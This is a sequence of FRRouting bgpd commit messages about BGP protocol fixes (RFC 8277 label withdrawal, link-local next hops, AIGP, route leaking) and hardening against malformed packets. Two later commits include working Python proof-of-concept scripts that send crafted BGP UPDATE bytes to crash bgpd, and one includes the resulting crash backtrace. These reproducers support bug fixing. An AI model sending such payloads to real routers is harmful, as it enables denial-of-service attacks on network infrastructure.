RFC8277 says:
The procedures in [RFC3107] for withdrawing the binding of a label
or sequence of labels to a prefix are not specified clearly and correctly.
=> How to Explicitly Withdraw the Binding of a Label to a Prefix
Suppose a BGP speaker has announced, on a given BGP session, the
binding of a given label or sequence of labels to a given prefix.
Suppose it now wishes to withdraw that binding. To do so, it may
send a BGP UPDATE message with an MP_UNREACH_NLRI attribute. The
NLRI field of this attribute is encoded as follows:
0 1 2 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Length | Compatibility |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Prefix ~
~ |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Figure 4: NLRI for Withdrawal
Upon transmission, the Compatibility field SHOULD be set to 0x800000.
Upon reception, the value of the Compatibility field MUST be ignored.
[RFC3107] also made it possible to withdraw a binding without
specifying the label explicitly, by setting the Compatibility field
to 0x800000. However, some implementations set it to 0x000000. In
order to ensure backwards compatibility, it is RECOMMENDED by this
document that the Compatibility field be set to 0x800000, but it is
REQUIRED that it be ignored upon reception.
In FRR case where a single label is used per-prefix, we should send 0x800000,
and not 0x000000.
Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org>
Even if we have unnumbered peering, let's respect `no neighbor X capability link-local`
and disable it per-neighbor on demand.
Fixes: db853cc97e ("bgpd: Implement Link-Local Next Hop capability")
Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org>
If we have LL Next Hop capability exchanged, we should send LL-only as 16-bytes
NH instead of a GUA (global unicast).
Fixes: db853cc97e ("bgpd: Implement Link-Local Next Hop capability")
Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org>
Related: https://datatracker.ietf.org/doc/html/draft-white-linklocal-capability
TL;DR; use 16 bytes long next-hops for point-to-point (unnumbered) links instead
of sending 32 bytes (::/LL, GUA/LL, LL/LL combinations).
For backward compatiblity we should handle even 32 bytes existing next hops.
Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org>
Extended communities can be transitive or non-transitive.
Like other attributes (e.g., MED) non-transitive extended communities SHOULD
be sent to the direct peer, but not forward them to eBGP peers next.
Before this patch, we never send non-transitive extended attributes to the
direct peers at all.
Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org>
Currently the AIGP is always incremented when a route with the
attribute is advertised. That is incorrect when the nexthop is
unchanged, as is commonly the case in route reflection.
Adjust the AIGP for propagation only when the nexthop is set
to ourselves.
Signed-off-by: Enke Chen <enchen@paloaltonetworks.com>
The nexthop metric should be added to AIGP when calculating the
bestpath in bgp_path_info_cmp().
Signed-off-by: Enke Chen <enchen@paloaltonetworks.com>
When parsing EVPN NLRIs, and an error occurred, do no forget to free the memory.
Fixes: 4ace11d010 ("bgpd: Move evpn_overlay to a pointer")
Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org>
In some cases (large scale) it's desired to avoid changing configurations, but
let the BGP to automatically handle ASN changes.
`auto` means the peering can be iBGP or eBGP. It will be automatically detected
and adjusted from the OPEN message.
Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org>
Instead of using 3 uint8_t variables under struct attr, let's use a single
uint8_t as the flags. Saving 2-bytes. Not a big deal, but it's even easier to
track EVPN-related flags/variables.
Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org>
When the packet is malformed it can use whatever values it wants. Let's check
what the real data we have in a stream instead of relying on malformed values.
Reported-by: Iggy Frankovic <iggyfran@amazon.com>
Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org>
E.g. Cisco sends AIGP attribute as transitive, but it's wrong. Hence, the session
is teared down, because of this bgp_attr_flag_invalid() test.
Relax this check if we have `neighbor X path-attribute <discard|treat-as-withdraw>`
configured.
Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org>
Link-bandwidth is encoded into extended community, not ipv6 extended community.
Thus it's not needed here at all.
Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org>
If we receive an attribute that is handled by bgp_attr_malformed(), use
treat-as-withdraw behavior for unknown (or missing to add - if new) attributes.
Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org>
Without this patch, we always set the BGP Prefix SID attribute flag without
checking if it's malformed or not. RFC8669 says that this attribute MUST be discarded.
Also, this fixes the bgpd crash when a malformed Prefix SID attribute is received,
with malformed transitive flags and/or TLVs.
Reported-by: Iggy Frankovic <iggyfran@amazon.com>
Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org>
Locally leaked routes remain active after the nexthop VRF interface goes
down.
Update route leaking when the loopback or a VRF interface state change is
received from zebra.
Signed-off-by: Louis Scalbert <louis.scalbert@6wind.com>
If 'bgp network import-check' is defined on the source BGP session,
prefixes that are defined with the network command cannot be leaked to
the other VRFs BGP table even if they are present in the origin VRF RIB
if the 'rt import' statement is defined after the 'network <prefix>'
ones.
When a prefix nexthop is updated, update the prefix route leaking. The
current state of nexthop validation is now stored in the attributes of
the bgp path info. Attributes are compared with the previous ones at
route leaking update so that a nexthop validation change now triggers
the update of destination VRF BGP table.
Signed-off-by: Louis Scalbert <louis.scalbert@6wind.com>
If we receive MP_UNREACH_NLRI, we should stop handling remaining NLRIs if
no mandatory path attributes received.
In other words, if MP_UNREACH_NLRI received, the remaining NLRIs should be handled
as a new data, but without mandatory attributes, it's a malformed packet.
In normal case, this MUST not happen at all, but to avoid crashing bgpd, we MUST
handle that.
Reported-by: Iggy Frankovic <iggyfran@amazon.com>
Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org>
Treat-as-withdraw, otherwise if we just ignore it, we will pass it to be
processed as a normal UPDATE without mandatory attributes, that could lead
to harmful behavior. In this case, a crash for route-maps with the configuration
such as:
```
router bgp 65001
no bgp ebgp-requires-policy
neighbor 127.0.0.1 remote-as external
neighbor 127.0.0.1 passive
neighbor 127.0.0.1 ebgp-multihop
neighbor 127.0.0.1 disable-connected-check
neighbor 127.0.0.1 update-source 127.0.0.2
neighbor 127.0.0.1 timers 3 90
neighbor 127.0.0.1 timers connect 1
!
address-family ipv4 unicast
neighbor 127.0.0.1 addpath-tx-all-paths
neighbor 127.0.0.1 default-originate
neighbor 127.0.0.1 route-map RM_IN in
exit-address-family
exit
!
route-map RM_IN permit 10
set as-path prepend 200
exit
```
Send a malformed optional transitive attribute:
```
import socket
import time
OPEN = (b"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
b"\xff\xff\x00\x62\x01\x04\xfd\xea\x00\x5a\x0a\x00\x00\x01\x45\x02"
b"\x06\x01\x04\x00\x01\x00\x01\x02\x02\x02\x00\x02\x02\x46\x00\x02"
b"\x06\x41\x04\x00\x00\xfd\xea\x02\x02\x06\x00\x02\x06\x45\x04\x00"
b"\x01\x01\x03\x02\x0e\x49\x0c\x0a\x64\x6f\x6e\x61\x74\x61\x73\x2d"
b"\x70\x63\x00\x02\x04\x40\x02\x00\x78\x02\x09\x47\x07\x00\x01\x01"
b"\x80\x00\x00\x00")
KEEPALIVE = (b"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
b"\xff\xff\xff\xff\xff\xff\x00\x13\x04")
UPDATE = bytearray.fromhex("ffffffffffffffffffffffffffffffff002b0200000003c0ff00010100eb00ac100b0b001ad908ac100b0b")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('127.0.0.2', 179))
s.send(OPEN)
data = s.recv(1024)
s.send(KEEPALIVE)
data = s.recv(1024)
s.send(UPDATE)
data = s.recv(1024)
time.sleep(100)
s.close()
```
Reported-by: Iggy Frankovic <iggyfran@amazon.com>
Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org>
If we send a crafted BGP UPDATE message without mandatory attributes, we do
not check if the length of the path attributes is zero or not. We only check
if attr->flag is at least set or not. Imagine we send only unknown transit
attribute, then attr->flag is always 0. Also, this is true only if graceful-restart
capability is received.
A crash:
```
bgpd[7834]: [TJ23Y-GY0RH] 127.0.0.1 Unknown attribute is received (type 31, length 16)
bgpd[7834]: [PCFFM-WMARW] 127.0.0.1(donatas-pc) rcvd UPDATE wlen 0 attrlen 20 alen 17
BGP[7834]: Received signal 11 at 1698089639 (si_addr 0x0, PC 0x55eefd375b4a); aborting...
BGP[7834]: /usr/local/lib/libfrr.so.0(zlog_backtrace_sigsafe+0x6d) [0x7f3205ca939d]
BGP[7834]: /usr/local/lib/libfrr.so.0(zlog_signal+0xf3) [0x7f3205ca9593]
BGP[7834]: /usr/local/lib/libfrr.so.0(+0xf5181) [0x7f3205cdd181]
BGP[7834]: /lib/x86_64-linux-gnu/libpthread.so.0(+0x12980) [0x7f3204ff3980]
BGP[7834]: /usr/lib/frr/bgpd(+0x18ab4a) [0x55eefd375b4a]
BGP[7834]: /usr/local/lib/libfrr.so.0(route_map_apply_ext+0x310) [0x7f3205cd1290]
BGP[7834]: /usr/lib/frr/bgpd(+0x163610) [0x55eefd34e610]
BGP[7834]: /usr/lib/frr/bgpd(bgp_update+0x9a5) [0x55eefd35c1d5]
BGP[7834]: /usr/lib/frr/bgpd(bgp_nlri_parse_ip+0xb7) [0x55eefd35e867]
BGP[7834]: /usr/lib/frr/bgpd(+0x1555e6) [0x55eefd3405e6]
BGP[7834]: /usr/lib/frr/bgpd(bgp_process_packet+0x747) [0x55eefd345597]
BGP[7834]: /usr/local/lib/libfrr.so.0(event_call+0x83) [0x7f3205cef4a3]
BGP[7834]: /usr/local/lib/libfrr.so.0(frr_run+0xc0) [0x7f3205ca10a0]
BGP[7834]: /usr/lib/frr/bgpd(main+0x409) [0x55eefd2dc979]
```
Sending:
```
import socket
import time
OPEN = (b"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
b"\xff\xff\x00\x62\x01\x04\xfd\xea\x00\x5a\x0a\x00\x00\x01\x45\x02"
b"\x06\x01\x04\x00\x01\x00\x01\x02\x02\x02\x00\x02\x02\x46\x00\x02"
b"\x06\x41\x04\x00\x00\xfd\xea\x02\x02\x06\x00\x02\x06\x45\x04\x00"
b"\x01\x01\x03\x02\x0e\x49\x0c\x0a\x64\x6f\x6e\x61\x74\x61\x73\x2d"
b"\x70\x63\x00\x02\x04\x40\x02\x00\x78\x02\x09\x47\x07\x00\x01\x01"
b"\x80\x00\x00\x00")
KEEPALIVE = (b"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
b"\xff\xff\xff\xff\xff\xff\x00\x13\x04")
UPDATE = bytearray.fromhex("ffffffffffffffffffffffffffffffff003c0200000014ff1f001000040146464646460004464646464646664646f50d05800100010200ffff000000")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('127.0.0.2', 179))
s.send(OPEN)
data = s.recv(1024)
s.send(KEEPALIVE)
data = s.recv(1024)
s.send(UPDATE)
data = s.recv(1024)
time.sleep(1000)
s.close()
```
Reported-by: Iggy Frankovic <iggyfran@amazon.com>
Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org>
Also:
- replace all /* fallthrough */ comments with portable fallthrough;
pseudo keyword to accomodate both gcc and clang
- add missing break; statements as required by older versions of gcc
- cleanup some code to remove unnecessary fallthrough
Signed-off-by: Igor Ryzhov <iryzhov@nfware.com>